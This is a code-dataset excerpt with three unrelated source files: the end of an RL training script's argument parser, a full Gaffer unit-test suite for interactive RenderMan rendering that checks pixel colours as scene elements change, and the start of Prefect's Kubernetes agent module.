parser.add_argument('model_name', type = str, help = 'Model name of the model.')
parser.add_argument('Algorithm', type = str, help = 'Implemented Policy gradient base algorithm. [A2C_l1 ..., check README.md ]')
parser.add_argument('device', type = int, help = 'device choosing for training. [-1 is cpu]')
parser.add_argument('--optimizer', type = str, default = 'Adam', help = 'The optimizer you can choose.')
parser.add_argument('--iterations', type = int, default = 10000, help = 'How many episode to train your policy net.')
parser.add_argument('--episode_size', type = int, default = 4, help = 'How many games to play in an episode.')
parser.add_argument('--batch_size', type = int, default = 128, help = 'batch_size using in dataloader argument.')
parser.add_argument('--checkpoint', type = int, default = 1000, help = 'The interval of saving a model checkpoint.')
parser.add_argument('--env', type = str, default = 'Pong-v0', help = 'The game that you want actor-critic agent to play.')
parser.add_argument('--slice_scoreboard', type = str2bool, default = True,
help = 'Method of image preprocess, if true, the scoreboard part of image would not feed into model.')
parser.add_argument('--gray_scale', type = str2bool, default = True,
help = 'Method of image preprocess, if true, the input image would from RGB -> Gray scale.')
parser.add_argument('--minus_observation', type = str2bool, default = True,
help = 'Method of image preprocess, if true, input image would become the last state - now state.')
parser.add_argument('--reward_normalize', type = str2bool, default = True,
help = 'Method of reward process, if true, reward would be normalize by batch.')
parser.add_argument('--decay_by_time', type = str2bool, default = True,
help = 'Method of reward process, if true, reward would decay by time step.')
opt = parser.parse_args()
print(opt)
return opt
if __name__ == '__main__':
start_time = time.time()
opt = init_parser(__name__)
observation_dict = construct_observation_preprocess_dict([opt.slice_scoreboard, opt.gray_scale, opt.minus_observation])
reward_dict = construct_reward_preprocess_dict([opt.decay_by_time, opt.reward_normalize])
trainer = ACTrainer(opt.model_type, opt.model_name, observation_dict, reward_dict, opt.device,
optimizer = opt.optimizer, policy = opt.Algorithm, env = opt.env)
trainer.play(opt.iterations, opt.episode_size, opt.batch_size, opt.checkpoint)
trainer.save_config(opt)
print('All process done, cause %s seconds.' % (time.time() - start_time))
| 48.567568
| 133
| 0.692543
|
703ee35d427936dc86bacf26b0b8254a9e4bffd7
| 25,886
|
py
|
Python
|
python/GafferRenderManTest/InteractiveRenderManRenderTest.py
|
dboogert/gaffer
|
d2ce0eb7134a33ceee375d0a3676129a9bdcfbc6
|
[
"BSD-3-Clause"
] | null | null | null |
python/GafferRenderManTest/InteractiveRenderManRenderTest.py
|
dboogert/gaffer
|
d2ce0eb7134a33ceee375d0a3676129a9bdcfbc6
|
[
"BSD-3-Clause"
] | null | null | null |
python/GafferRenderManTest/InteractiveRenderManRenderTest.py
|
dboogert/gaffer
|
d2ce0eb7134a33ceee375d0a3676129a9bdcfbc6
|
[
"BSD-3-Clause"
] | null | null | null |
##########################################################################
#
# Copyright (c) 2013, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import unittest
import time
import os
import IECore
import Gaffer
import GafferImage
import GafferScene
import GafferRenderMan
import GafferRenderManTest
class InteractiveRenderManRenderTest( GafferRenderManTest.RenderManTestCase ) :
def __colorAtUV( self, image, uv ) :
e = IECore.ImagePrimitiveEvaluator( image )
r = e.createResult()
e.pointAtUV( uv, r )
return IECore.Color3f(
r.floatPrimVar( image["R"] ),
r.floatPrimVar( image["G"] ),
r.floatPrimVar( image["B"] ),
)
def testLights( self ) :
s = Gaffer.ScriptNode()
s["l"] = GafferRenderMan.RenderManLight()
s["l"].loadShader( "pointlight" )
s["l"]["parameters"]["lightcolor"].setValue( IECore.Color3f( 1, 0.5, 0.25 ) )
s["l"]["transform"]["translate"]["z"].setValue( 1 )
s["p"] = GafferScene.Plane()
s["c"] = GafferScene.Camera()
s["c"]["transform"]["translate"]["z"].setValue( 1 )
s["g"] = GafferScene.Group()
s["g"]["in"].setInput( s["l"]["out"] )
s["g"]["in1"].setInput( s["p"]["out"] )
s["g"]["in2"].setInput( s["c"]["out"] )
s["s"] = GafferRenderMan.RenderManShader()
s["s"].loadShader( "matte" )
s["a"] = GafferScene.ShaderAssignment()
s["a"]["in"].setInput( s["g"]["out"] )
s["a"]["shader"].setInput( s["s"]["out"] )
s["d"] = GafferScene.Displays()
s["d"].addDisplay(
"beauty",
IECore.Display(
"test",
"ieDisplay",
"rgba",
{
"quantize" : IECore.FloatVectorData( [ 0, 0, 0, 0 ] ),
"driverType" : "ImageDisplayDriver",
"handle" : "myLovelyPlane",
}
)
)
s["d"]["in"].setInput( s["a"]["out"] )
s["o"] = GafferScene.StandardOptions()
s["o"]["options"]["renderCamera"]["value"].setValue( "/group/camera" )
s["o"]["options"]["renderCamera"]["enabled"].setValue( True )
s["o"]["in"].setInput( s["d"]["out"] )
s["r"] = GafferRenderMan.InteractiveRenderManRender()
s["r"]["in"].setInput( s["o"]["out"] )
# start a render, give it time to finish, and check the output
s["r"]["state"].setValue( s["r"].State.Running )
time.sleep( 2 )
c = self.__colorAtUV(
IECore.ImageDisplayDriver.storedImage( "myLovelyPlane" ),
IECore.V2f( 0.5 ),
)
self.assertEqual( c / c[0], IECore.Color3f( 1, 0.5, 0.25 ) )
# adjust a parameter, give it time to update, and check the output
s["l"]["parameters"]["lightcolor"].setValue( IECore.Color3f( 0.25, 0.5, 1 ) )
time.sleep( 1 )
c = self.__colorAtUV(
IECore.ImageDisplayDriver.storedImage( "myLovelyPlane" ),
IECore.V2f( 0.5 ),
)
self.assertEqual( c / c[2], IECore.Color3f( 0.25, 0.5, 1 ) )
# pause it, adjust a parameter, wait, and check that nothing changed
s["r"]["state"].setValue( s["r"].State.Paused )
s["l"]["parameters"]["lightcolor"].setValue( IECore.Color3f( 1, 0.5, 0.25 ) )
time.sleep( 1 )
c = self.__colorAtUV(
IECore.ImageDisplayDriver.storedImage( "myLovelyPlane" ),
IECore.V2f( 0.5 ),
)
self.assertEqual( c / c[2], IECore.Color3f( 0.25, 0.5, 1 ) )
# unpause it, wait, and check that the update happened
s["r"]["state"].setValue( s["r"].State.Running )
time.sleep( 1 )
c = self.__colorAtUV(
IECore.ImageDisplayDriver.storedImage( "myLovelyPlane" ),
IECore.V2f( 0.5 ),
)
self.assertEqual( c / c[0], IECore.Color3f( 1, 0.5, 0.25 ) )
# turn off light updates, adjust a parameter, wait, and check nothing happened
s["r"]["updateLights"].setValue( False )
s["l"]["parameters"]["lightcolor"].setValue( IECore.Color3f( 0.25, 0.5, 1 ) )
time.sleep( 1 )
c = self.__colorAtUV(
IECore.ImageDisplayDriver.storedImage( "myLovelyPlane" ),
IECore.V2f( 0.5 ),
)
self.assertEqual( c / c[0], IECore.Color3f( 1, 0.5, 0.25 ) )
# turn light updates back on and check that it updates
s["r"]["updateLights"].setValue( True )
time.sleep( 1 )
c = self.__colorAtUV(
IECore.ImageDisplayDriver.storedImage( "myLovelyPlane" ),
IECore.V2f( 0.5 ),
)
self.assertEqual( c / c[2], IECore.Color3f( 0.25, 0.5, 1 ) )
# stop the render, tweak a parameter and check that nothing happened
s["r"]["state"].setValue( s["r"].State.Stopped )
s["l"]["parameters"]["lightcolor"].setValue( IECore.Color3f( 1, 0.5, 0.25 ) )
time.sleep( 1 )
c = self.__colorAtUV(
IECore.ImageDisplayDriver.storedImage( "myLovelyPlane" ),
IECore.V2f( 0.5 ),
)
self.assertEqual( c / c[2], IECore.Color3f( 0.25, 0.5, 1 ) )
def testShaders( self ) :
s = Gaffer.ScriptNode()
s["p"] = GafferScene.Plane()
s["p"]["transform"]["translate"].setValue( IECore.V3f( -0.1, -0.1, 0 ) )
s["c"] = GafferScene.Camera()
s["c"]["transform"]["translate"]["z"].setValue( 1 )
s["l"] = GafferRenderMan.RenderManLight()
s["l"].loadShader( "ambientlight" )
s["g"] = GafferScene.Group()
s["g"]["in"].setInput( s["p"]["out"] )
s["g"]["in1"].setInput( s["c"]["out"] )
s["g"]["in2"].setInput( s["l"]["out"] )
s["s"] = GafferRenderMan.RenderManShader()
s["s"].loadShader( "checker" )
s["s"]["parameters"]["blackcolor"].setValue( IECore.Color3f( 1, 0.5, 0.25 ) )
s["s"]["parameters"]["Ka"].setValue( 1 )
s["s"]["parameters"]["frequency"].setValue( 1 )
s["a"] = GafferScene.ShaderAssignment()
s["a"]["in"].setInput( s["g"]["out"] )
s["a"]["shader"].setInput( s["s"]["out"] )
s["d"] = GafferScene.Displays()
s["d"].addDisplay(
"beauty",
IECore.Display(
"test",
"ieDisplay",
"rgba",
{
"quantize" : IECore.FloatVectorData( [ 0, 0, 0, 0 ] ),
"driverType" : "ImageDisplayDriver",
"handle" : "myLovelyPlane",
}
)
)
s["d"]["in"].setInput( s["a"]["out"] )
s["o"] = GafferScene.StandardOptions()
s["o"]["options"]["renderCamera"]["value"].setValue( "/group/camera" )
s["o"]["options"]["renderCamera"]["enabled"].setValue( True )
s["o"]["in"].setInput( s["d"]["out"] )
s["r"] = GafferRenderMan.InteractiveRenderManRender()
s["r"]["in"].setInput( s["o"]["out"] )
# start a render, give it time to finish, and check the output
s["r"]["state"].setValue( s["r"].State.Running )
time.sleep( 2 )
c = self.__colorAtUV(
IECore.ImageDisplayDriver.storedImage( "myLovelyPlane" ),
IECore.V2f( 0.5 ),
)
self.assertEqual( c, IECore.Color3f( 1, 0.5, 0.25 ) )
# adjust a shader parameter, wait, and check that it changed
s["s"]["parameters"]["blackcolor"].setValue( IECore.Color3f( 1, 1, 1 ) )
time.sleep( 1 )
c = self.__colorAtUV(
IECore.ImageDisplayDriver.storedImage( "myLovelyPlane" ),
IECore.V2f( 0.5 ),
)
self.assertEqual( c, IECore.Color3f( 1 ) )
# turn off shader updates, do the same, and check that it hasn't changed
s["r"]["updateShaders"].setValue( False )
s["s"]["parameters"]["blackcolor"].setValue( IECore.Color3f( 0.5 ) )
time.sleep( 1 )
c = self.__colorAtUV(
IECore.ImageDisplayDriver.storedImage( "myLovelyPlane" ),
IECore.V2f( 0.5 ),
)
self.assertEqual( c, IECore.Color3f( 1 ) )
# turn shader updates back on, and check that it updates
s["r"]["updateShaders"].setValue( True )
time.sleep( 1 )
c = self.__colorAtUV(
IECore.ImageDisplayDriver.storedImage( "myLovelyPlane" ),
IECore.V2f( 0.5 ),
)
self.assertEqual( c, IECore.Color3f( 0.5 ) )
def testScopesDontLeak( self ) :
s = Gaffer.ScriptNode()
s["p"] = GafferScene.Plane()
s["p"]["transform"]["translate"].setValue( IECore.V3f( -0.6, -0.1, 0 ) )
s["p1"] = GafferScene.Plane()
s["p1"]["transform"]["translate"].setValue( IECore.V3f( 0.6, 0.1, 0 ) )
s["c"] = GafferScene.Camera()
s["c"]["transform"]["translate"]["z"].setValue( 2 )
s["l"] = GafferRenderMan.RenderManLight()
s["l"].loadShader( "ambientlight" )
s["g"] = GafferScene.Group()
s["g"]["in"].setInput( s["p"]["out"] )
s["g"]["in1"].setInput( s["p1"]["out"] )
s["g"]["in2"].setInput( s["c"]["out"] )
s["g"]["in3"].setInput( s["l"]["out"] )
s["s"] = GafferRenderMan.RenderManShader()
s["s"].loadShader( "checker" )
s["s"]["parameters"]["blackcolor"].setValue( IECore.Color3f( 1, 0, 0 ) )
s["s"]["parameters"]["Ka"].setValue( 1 )
s["s"]["parameters"]["frequency"].setValue( 1 )
s["f"] = GafferScene.PathFilter()
s["f"]["paths"].setValue( IECore.StringVectorData( [ "/group/plane" ] ) )
s["a"] = GafferScene.ShaderAssignment()
s["a"]["in"].setInput( s["g"]["out"] )
s["a"]["shader"].setInput( s["s"]["out"] )
s["a"]["filter"].setInput( s["f"]["match"] )
s["d"] = GafferScene.Displays()
s["d"].addDisplay(
"beauty",
IECore.Display(
"test",
"ieDisplay",
"rgba",
{
"quantize" : IECore.FloatVectorData( [ 0, 0, 0, 0 ] ),
"driverType" : "ImageDisplayDriver",
"handle" : "myLovelyPlanes",
}
)
)
s["d"]["in"].setInput( s["a"]["out"] )
s["o"] = GafferScene.StandardOptions()
s["o"]["options"]["renderCamera"]["value"].setValue( "/group/camera" )
s["o"]["options"]["renderCamera"]["enabled"].setValue( True )
s["o"]["options"]["renderResolution"]["value"].setValue( IECore.V2i( 512 ) )
s["o"]["options"]["renderResolution"]["enabled"].setValue( True )
s["o"]["in"].setInput( s["d"]["out"] )
s["r"] = GafferRenderMan.InteractiveRenderManRender()
s["r"]["in"].setInput( s["o"]["out"] )
# start a render, give it time to finish, and check the output.
# we should have a red plane on the left, and a facing ratio
# shaded plane on the right, because we attached no shader to the
# second plane.
s["r"]["state"].setValue( s["r"].State.Running )
time.sleep( 2 )
c = self.__colorAtUV(
IECore.ImageDisplayDriver.storedImage( "myLovelyPlanes" ),
IECore.V2f( 0.25, 0.5 ),
)
self.assertEqual( c, IECore.Color3f( 1, 0, 0 ) )
c1 = self.__colorAtUV(
IECore.ImageDisplayDriver.storedImage( "myLovelyPlanes" ),
IECore.V2f( 0.75, 0.5 ),
)
self.assertTrue( c1[0] > 0.9 )
self.assertEqual( c1[0], c1[1] )
self.assertEqual( c1[0], c1[2] )
# adjust a shader parameter, wait, and check that the plane
# on the left changed. check that the plane on the right didn't
# change at all.
s["s"]["parameters"]["blackcolor"].setValue( IECore.Color3f( 0, 1, 0 ) )
time.sleep( 2 )
c = self.__colorAtUV(
IECore.ImageDisplayDriver.storedImage( "myLovelyPlanes" ),
IECore.V2f( 0.25, 0.5 ),
)
self.assertEqual( c, IECore.Color3f( 0, 1, 0 ) )
c1 = self.__colorAtUV(
IECore.ImageDisplayDriver.storedImage( "myLovelyPlanes" ),
IECore.V2f( 0.75, 0.5 ),
)
self.assertTrue( c1[0] > 0.9 )
self.assertEqual( c1[0], c1[1] )
self.assertEqual( c1[0], c1[2] )
def testContext( self ):
s = Gaffer.ScriptNode()
r = GafferRenderMan.InteractiveRenderManRender()
self.assertNotEqual( r.getContext(), None )
self.failIf( r.getContext().isSame( s.context() ) )
s["r"] = r
self.failUnless( r.getContext().isSame( s.context() ) )
s.removeChild( r )
self.failIf( r.getContext().isSame( s.context() ) )
def testAddLight( self ) :
s = Gaffer.ScriptNode()
s["l"] = GafferRenderMan.RenderManLight()
s["l"].loadShader( "pointlight" )
s["l"]["parameters"]["lightcolor"].setValue( IECore.Color3f( 1, 0, 0 ) )
s["l"]["transform"]["translate"]["z"].setValue( 1 )
s["p"] = GafferScene.Plane()
s["c"] = GafferScene.Camera()
s["c"]["transform"]["translate"]["z"].setValue( 1 )
s["g"] = GafferScene.Group()
s["g"]["in"].setInput( s["l"]["out"] )
s["g"]["in1"].setInput( s["p"]["out"] )
s["g"]["in2"].setInput( s["c"]["out"] )
s["s"] = GafferRenderMan.RenderManShader()
s["s"].loadShader( "matte" )
s["a"] = GafferScene.ShaderAssignment()
s["a"]["in"].setInput( s["g"]["out"] )
s["a"]["shader"].setInput( s["s"]["out"] )
s["d"] = GafferScene.Displays()
s["d"].addDisplay(
"beauty",
IECore.Display(
"test",
"ieDisplay",
"rgba",
{
"quantize" : IECore.FloatVectorData( [ 0, 0, 0, 0 ] ),
"driverType" : "ImageDisplayDriver",
"handle" : "myLovelyPlane",
}
)
)
s["d"]["in"].setInput( s["a"]["out"] )
s["o"] = GafferScene.StandardOptions()
s["o"]["options"]["renderCamera"]["value"].setValue( "/group/camera" )
s["o"]["options"]["renderCamera"]["enabled"].setValue( True )
s["o"]["in"].setInput( s["d"]["out"] )
s["r"] = GafferRenderMan.InteractiveRenderManRender()
s["r"]["in"].setInput( s["o"]["out"] )
# start a render, give it time to finish, and check the output
s["r"]["state"].setValue( s["r"].State.Running )
time.sleep( 2 )
c = self.__colorAtUV(
IECore.ImageDisplayDriver.storedImage( "myLovelyPlane" ),
IECore.V2f( 0.5 ),
)
self.assertEqual( c / c[0], IECore.Color3f( 1, 0, 0 ) )
# add a light
s["l2"] = GafferRenderMan.RenderManLight()
s["l2"].loadShader( "pointlight" )
s["l2"]["parameters"]["lightcolor"].setValue( IECore.Color3f( 0, 1, 0 ) )
s["l2"]["transform"]["translate"]["z"].setValue( 1 )
s["g"]["in3"].setInput( s["l2"]["out"] )
# give it time to update, and check the output
time.sleep( 1 )
c = self.__colorAtUV(
IECore.ImageDisplayDriver.storedImage( "myLovelyPlane" ),
IECore.V2f( 0.5 ),
)
self.assertEqual( c / c[0], IECore.Color3f( 1, 1, 0 ) )
def testRemoveLight( self ) :
s = Gaffer.ScriptNode()
s["l"] = GafferRenderMan.RenderManLight()
s["l"].loadShader( "pointlight" )
s["l"]["transform"]["translate"]["z"].setValue( 1 )
s["p"] = GafferScene.Plane()
s["c"] = GafferScene.Camera()
s["c"]["transform"]["translate"]["z"].setValue( 1 )
s["g"] = GafferScene.Group()
s["g"]["in"].setInput( s["l"]["out"] )
s["g"]["in1"].setInput( s["p"]["out"] )
s["g"]["in2"].setInput( s["c"]["out"] )
s["s"] = GafferRenderMan.RenderManShader()
s["s"].loadShader( "matte" )
s["a"] = GafferScene.ShaderAssignment()
s["a"]["in"].setInput( s["g"]["out"] )
s["a"]["shader"].setInput( s["s"]["out"] )
s["d"] = GafferScene.Displays()
s["d"].addDisplay(
"beauty",
IECore.Display(
"test",
"ieDisplay",
"rgba",
{
"quantize" : IECore.FloatVectorData( [ 0, 0, 0, 0 ] ),
"driverType" : "ImageDisplayDriver",
"handle" : "myLovelyPlane",
}
)
)
s["d"]["in"].setInput( s["a"]["out"] )
s["o"] = GafferScene.StandardOptions()
s["o"]["options"]["renderCamera"]["value"].setValue( "/group/camera" )
s["o"]["options"]["renderCamera"]["enabled"].setValue( True )
s["o"]["in"].setInput( s["d"]["out"] )
s["r"] = GafferRenderMan.InteractiveRenderManRender()
s["r"]["in"].setInput( s["o"]["out"] )
# start a render, give it time to finish, and check the output
s["r"]["state"].setValue( s["r"].State.Running )
time.sleep( 2 )
c = self.__colorAtUV(
IECore.ImageDisplayDriver.storedImage( "myLovelyPlane" ),
IECore.V2f( 0.5 ),
)
self.assertNotEqual( c[0], 0.0 )
# remove the light by disabling it
s["l"]["enabled"].setValue( False )
time.sleep( 2 )
c = self.__colorAtUV(
IECore.ImageDisplayDriver.storedImage( "myLovelyPlane" ),
IECore.V2f( 0.5 ),
)
self.assertEqual( c[0], 0.0 )
# enable it again
s["l"]["enabled"].setValue( True )
time.sleep( 2 )
c = self.__colorAtUV(
IECore.ImageDisplayDriver.storedImage( "myLovelyPlane" ),
IECore.V2f( 0.5 ),
)
self.assertNotEqual( c[0], 0.0 )
def testHideLight( self ) :
s = Gaffer.ScriptNode()
s["l"] = GafferRenderMan.RenderManLight()
s["l"].loadShader( "pointlight" )
s["l"]["transform"]["translate"]["z"].setValue( 1 )
s["v"] = GafferScene.StandardAttributes()
s["v"]["attributes"]["visibility"]["enabled"].setValue( True )
s["v"]["in"].setInput( s["l"]["out"] )
s["p"] = GafferScene.Plane()
s["c"] = GafferScene.Camera()
s["c"]["transform"]["translate"]["z"].setValue( 1 )
s["g"] = GafferScene.Group()
s["g"]["in"].setInput( s["v"]["out"] )
s["g"]["in1"].setInput( s["p"]["out"] )
s["g"]["in2"].setInput( s["c"]["out"] )
s["s"] = GafferRenderMan.RenderManShader()
s["s"].loadShader( "matte" )
s["a"] = GafferScene.ShaderAssignment()
s["a"]["in"].setInput( s["g"]["out"] )
s["a"]["shader"].setInput( s["s"]["out"] )
s["d"] = GafferScene.Displays()
s["d"].addDisplay(
"beauty",
IECore.Display(
"test",
"ieDisplay",
"rgba",
{
"quantize" : IECore.FloatVectorData( [ 0, 0, 0, 0 ] ),
"driverType" : "ImageDisplayDriver",
"handle" : "myLovelyPlane",
}
)
)
s["d"]["in"].setInput( s["a"]["out"] )
s["o"] = GafferScene.StandardOptions()
s["o"]["options"]["renderCamera"]["value"].setValue( "/group/camera" )
s["o"]["options"]["renderCamera"]["enabled"].setValue( True )
s["o"]["in"].setInput( s["d"]["out"] )
s["r"] = GafferRenderMan.InteractiveRenderManRender()
s["r"]["in"].setInput( s["o"]["out"] )
# start a render, give it time to finish, and check the output
s["r"]["state"].setValue( s["r"].State.Running )
time.sleep( 2 )
c = self.__colorAtUV(
IECore.ImageDisplayDriver.storedImage( "myLovelyPlane" ),
IECore.V2f( 0.5 ),
)
self.assertNotEqual( c[0], 0.0 )
# remove the light by hiding it
s["v"]["attributes"]["visibility"]["value"].setValue( False )
time.sleep( 2 )
c = self.__colorAtUV(
IECore.ImageDisplayDriver.storedImage( "myLovelyPlane" ),
IECore.V2f( 0.5 ),
)
self.assertEqual( c[0], 0.0 )
# put the light back by showing it
s["v"]["attributes"]["visibility"]["value"].setValue( True )
time.sleep( 2 )
c = self.__colorAtUV(
IECore.ImageDisplayDriver.storedImage( "myLovelyPlane" ),
IECore.V2f( 0.5 ),
)
self.assertNotEqual( c[0], 0.0 )
def testRenderingDuringScriptDeletion( self ) :
s = Gaffer.ScriptNode()
s["p"] = GafferScene.Plane()
s["c"] = GafferScene.Camera()
s["c"]["transform"]["translate"]["z"].setValue( 1 )
s["g"] = GafferScene.Group()
s["g"]["in"].setInput( s["p"]["out"] )
s["g"]["in1"].setInput( s["c"]["out"] )
s["d"] = GafferScene.Displays()
s["d"].addDisplay(
"beauty",
IECore.Display(
"test",
"ieDisplay",
"rgba",
{
"driverType" : "ClientDisplayDriver",
"displayHost" : "localhost",
"displayPort" : "1559",
"remoteDisplayType" : "GafferImage::GafferDisplayDriver",
"quantize" : IECore.IntVectorData( [ 0, 0, 0, 0 ] ),
}
)
)
s["d"]["in"].setInput( s["g"]["out"] )
s["m"] = GafferImage.Display()
# connect a python function to the Display node image and data
# received signals. this emulates what the UI does.
def __displayCallback( plug ) :
pass
c = (
s["m"].imageReceivedSignal().connect( __displayCallback ),
s["m"].dataReceivedSignal().connect( __displayCallback ),
)
s["o"] = GafferScene.StandardOptions()
s["o"]["in"].setInput( s["d"]["out"] )
s["o"]["options"]["renderCamera"]["enabled"].setValue( True )
s["o"]["options"]["renderCamera"]["value"].setValue( "/group/plane" )
s["r"] = GafferRenderMan.InteractiveRenderManRender()
s["r"]["in"].setInput( s["o"]["out"] )
s["r"]["state"].setValue( s["r"].State.Running )
time.sleep( 1 )
# delete the script while the render is still progressing. when
# this occurs, deletion of the render node will be triggered, which
# will in turn stop the render. this may flush data to the display,
# in which case it will emit its data and image received signals
# on a separate thread. if we're still holding the gil on the main
# thread when this happens, we'll get a deadlock.
del s
def testMoveCamera( self ) :
s = Gaffer.ScriptNode()
s["p"] = GafferScene.Plane()
s["c"] = GafferScene.Camera()
s["c"]["transform"]["translate"]["z"].setValue( 1 )
s["g"] = GafferScene.Group()
s["g"]["in"].setInput( s["p"]["out"] )
s["g"]["in1"].setInput( s["c"]["out"] )
s["d"] = GafferScene.Displays()
s["d"].addDisplay(
"beauty",
IECore.Display(
"test",
"ieDisplay",
"rgba",
{
"quantize" : IECore.FloatVectorData( [ 0, 0, 0, 0 ] ),
"driverType" : "ImageDisplayDriver",
"handle" : "myLovelyPlane",
}
)
)
s["d"]["in"].setInput( s["g"]["out"] )
s["o"] = GafferScene.StandardOptions()
s["o"]["options"]["renderCamera"]["value"].setValue( "/group/camera" )
s["o"]["options"]["renderCamera"]["enabled"].setValue( True )
s["o"]["in"].setInput( s["d"]["out"] )
s["r"] = GafferRenderMan.InteractiveRenderManRender()
s["r"]["in"].setInput( s["o"]["out"] )
# start a render, give it time to finish, and check the output
s["r"]["state"].setValue( s["r"].State.Running )
time.sleep( 2 )
c = self.__colorAtUV(
IECore.ImageDisplayDriver.storedImage( "myLovelyPlane" ),
IECore.V2f( 0.5 ),
)
self.assertAlmostEqual( c[1], 1, delta = 0.001 )
# move the camera so it can't see the plane, and check the output
s["c"]["transform"]["translate"]["x"].setValue( 2 )
time.sleep( 2 )
c = self.__colorAtUV(
IECore.ImageDisplayDriver.storedImage( "myLovelyPlane" ),
IECore.V2f( 0.5 ),
)
self.assertAlmostEqual( c[0], 0 )
# move the camera back and recheck
s["c"]["transform"]["translate"]["x"].setValue( 0 )
time.sleep( 2 )
c = self.__colorAtUV(
IECore.ImageDisplayDriver.storedImage( "myLovelyPlane" ),
IECore.V2f( 0.5 ),
)
self.assertAlmostEqual( c[1], 1, delta = 0.001 )
def testMoveCoordinateSystem( self ) :
shader = self.compileShader( os.path.dirname( __file__ ) + "/shaders/coordSysDot.sl" )
s = Gaffer.ScriptNode()
s["plane"] = GafferScene.Plane()
s["shader"] = GafferRenderMan.RenderManShader()
s["shader"].loadShader( shader )
s["shader"]["parameters"]["coordSys"].setValue( "/group/coordinateSystem" )
s["shaderAssignment"] = GafferScene.ShaderAssignment()
s["shaderAssignment"]["in"].setInput( s["plane"]["out"] )
s["shaderAssignment"]["shader"].setInput( s["shader"]["out"] )
s["camera"] = GafferScene.Camera()
s["camera"]["transform"]["translate"]["z"].setValue( 1 )
s["coordSys"] = GafferScene.CoordinateSystem()
s["g"] = GafferScene.Group()
s["g"]["in"].setInput( s["shaderAssignment"]["out"] )
s["g"]["in1"].setInput( s["camera"]["out"] )
s["g"]["in2"].setInput( s["coordSys"]["out"] )
s["d"] = GafferScene.Displays()
s["d"].addDisplay(
"beauty",
IECore.Display(
"test",
"ieDisplay",
"rgba",
{
"quantize" : IECore.FloatVectorData( [ 0, 0, 0, 0 ] ),
"driverType" : "ImageDisplayDriver",
"handle" : "myLovelyPlane",
}
)
)
s["d"]["in"].setInput( s["g"]["out"] )
s["o"] = GafferScene.StandardOptions()
s["o"]["options"]["renderCamera"]["value"].setValue( "/group/camera" )
s["o"]["options"]["renderCamera"]["enabled"].setValue( True )
s["o"]["in"].setInput( s["d"]["out"] )
s["r"] = GafferRenderMan.InteractiveRenderManRender()
s["r"]["in"].setInput( s["o"]["out"] )
# start a render, give it time to finish, and check the output
s["r"]["state"].setValue( s["r"].State.Running )
time.sleep( 2 )
c = self.__colorAtUV(
IECore.ImageDisplayDriver.storedImage( "myLovelyPlane" ),
IECore.V2f( 0.5 ),
)
self.assertAlmostEqual( c[1], 1, delta = 0.001 )
# move the coordinate system, and check the output
s["coordSys"]["transform"]["translate"]["x"].setValue( 0.1 )
time.sleep( 2 )
c = self.__colorAtUV(
IECore.ImageDisplayDriver.storedImage( "myLovelyPlane" ),
IECore.V2f( 0.6, 0.5 ),
)
self.assertAlmostEqual( c[0], 1 )
c = self.__colorAtUV(
IECore.ImageDisplayDriver.storedImage( "myLovelyPlane" ),
IECore.V2f( 0.6, 0.7 ),
)
self.assertAlmostEqual( c[0], 0 )
# scale the coordinate system to cover everything, and check again
s["coordSys"]["transform"]["scale"].setValue( IECore.V3f( 100 ) )
time.sleep( 2 )
for p in [
IECore.V2f( 0.5 ),
IECore.V2f( 0.1 ),
IECore.V2f( 0.9 ),
] :
c = self.__colorAtUV(
IECore.ImageDisplayDriver.storedImage( "myLovelyPlane" ),
p,
)
self.assertAlmostEqual( c[0], 1, delta = 0.001 )
if __name__ == "__main__":
unittest.main()
| 28.826281
| 88
| 0.601792
|
60eafdc2219ed8c18cbf6702cdd2feefe764ddf2
| 32,766
|
py
|
Python
|
src/prefect/agent/kubernetes/agent.py
|
jackdesert/prefect
|
8ff23d50b5488a0bf7eea19ed7ee5fe660819640
|
[
"Apache-2.0"
] | null | null | null |
src/prefect/agent/kubernetes/agent.py
|
jackdesert/prefect
|
8ff23d50b5488a0bf7eea19ed7ee5fe660819640
|
[
"Apache-2.0"
] | null | null | null |
src/prefect/agent/kubernetes/agent.py
|
jackdesert/prefect
|
8ff23d50b5488a0bf7eea19ed7ee5fe660819640
|
[
"Apache-2.0"
] | null | null | null |
import os
import time
import uuid
from typing import Iterable, List, Any
import json
import yaml
import prefect
from prefect import config
from prefect.agent import Agent
from prefect.engine.state import Failed
from prefect.run_configs import KubernetesRun
from prefect.utilities.agent import get_flow_image, get_flow_run_command
from prefect.utilities.filesystems import read_bytes_from_path
from prefect.utilities.graphql import GraphQLResult
DEFAULT_JOB_TEMPLATE_PATH = os.path.join(os.path.dirname(__file__), "job_template.yaml")
def _get_or_create(d: dict, key: str, val: Any = None) -> Any:
"""Get a (possibly nested) field from a dict, creating intermediate values
if needed."""
if val is None:
val = {}
path = key.split(".")
for k in path[:-1]:
d = d.setdefault(k, {})
return d.setdefault(path[-1], val)
class KubernetesAgent(Agent):
"""
Agent which deploys flow runs as Kubernetes jobs. Currently this is required to either
run on a k8s cluster or on a local machine where the kube_config is pointing at the
desired cluster. Information on using the Kubernetes Agent can be found at
https://docs.prefect.io/orchestration/agents/kubernetes.html
Environment variables may be set on the agent to be provided to each flow run's job:
```
